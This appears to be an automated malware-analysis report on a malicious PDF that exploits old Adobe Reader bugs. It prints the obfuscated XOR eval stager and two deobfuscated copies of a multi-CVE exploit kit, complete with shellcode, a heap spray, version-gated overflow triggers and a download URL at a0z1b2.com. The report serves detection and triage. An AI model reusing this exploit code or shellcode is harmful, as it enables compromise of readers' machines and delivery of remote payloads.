PDF malware analysis — malicious · be82dce60a1997d1

MALICIOUS

PDF

4.5 KB Authoring application: Vabameuaki First seen: 2026-05-11

MD5: c9ca44a9e53bab6df175c39677fd1901 SHA-1: a60940ede96d2f96e05e53df7599931eb0dda999 SHA-256: be82dce60a1997d1a719d227168a4e99aa4135d33e4991979da8945a346d7bb5

450 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, identified by the 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_PAGE_WORD_XOR_EVAL_STAGER' heuristics. The JavaScript is obfuscated and appears to be a stager, likely intended to download and execute a second-stage payload. The exact nature of the payload and its delivery mechanism cannot be determined due to the obfuscation.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 11

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER

PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://a0z1b2.com//moSbCyjpK-l.php/38788eccf20f2a799949918d01e64e83?spl=pdf_2025 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0011_000.js`	pdf-javascript-stream	PDF /JS object 11 at offset 0xCA2	815 bytes
SHA-256: `1ec398366107a5fedd9bcf18a57f32d68d58e87986c8ad1c876f457b209e2152`
Preview script First 1,000 lines of the extracted script var qX=String("getPa"+"geNth1OA8".substr(0,5)+"IsbWord".substr(3));function t(h,j){return h^j;};var jS=this;;var aR=new String("from"+"G0DChar".substr(3)+"CodeWqM2".substr(0,4));var p=String;var f=new String();var pY="unes"+"cape";var cV="subs"+"trDbgy".substr(0,2);var jSX=1;var n=91;var hS="getPa"+"YTRgeNum".substr(3)+"hOXWords".substr(3);var cX=String("char"+"Code1jzi".substr(0,4)+"At52Ml".substr(0,2));var nM=["p","","p","a"];oX=new String(nM[3]+nM[0]+nM[0]+nM[1]);var nO=["l","e","v","","a"];sX=new String(nO[1]+nO[2]+nO[4]+nO[0]+nO[3]);var l=4618-4618;;var z=new String("U9j%".substr(3));var v=73-71;var x=jS[sX];var hC=jS[hS](jSX);var oX=jS[oX];;var oR=jS[pY];for(var d=l;d<hC;d++){jW=jS[qX](jSX,d);var uN=jW[cV](jW.length-v,v);var nC=z+uN;var mT=oR(nC);var hI=mT[cX](l);var cD=t(hI,n);f+=p[aR](cD);}x(f);
`legacy_pdfkit_stage_000.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3411 bytes
SHA-256: `912e0d269cb76c8d83cc365160646689ee885ee419059bcd55f7571495d8b809`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script /* getPageWords download URL: http://a0z1b2.com//moSbCyjpK-l.php/38788eccf20f2a799949918d01e64e83?spl=pdf_2025 / var _u="http://a0z1b2.com//moSbCyjpK-l.php/38788eccf20f2a799949918d01e64e83?spl=pdf_2025"; var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%"; var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U"; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.author; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); var sf="1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch(e) {} util.printd(sf, new Date()); } } U2UcYKr(); hhg��i/
`legacy_pdfkit_stage_001.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3402 bytes
SHA-256: `5c1541ff245d9217c65681ea155c11bc5d1ec2f6f5c3c3d372127a2564fdf74e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script /* getPageWords download URL: http://a0z1b2.com//moSbCyjpK-l.php/38788eccf20f2a799949918d01e64e83?spl=pdf_2025 / var _u="http://a0z1b2.com//moSbCyjpK-l.php/38788eccf20f2a799949918d01e64e83?spl=pdf_2025"; var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%"; var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U"; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.author; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); var sf="1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch(e) {} util.printd(sf, new Date()); } } U2UcYKr(); �/n

Open this report in the interactive analyzer, or submit your own file for analysis.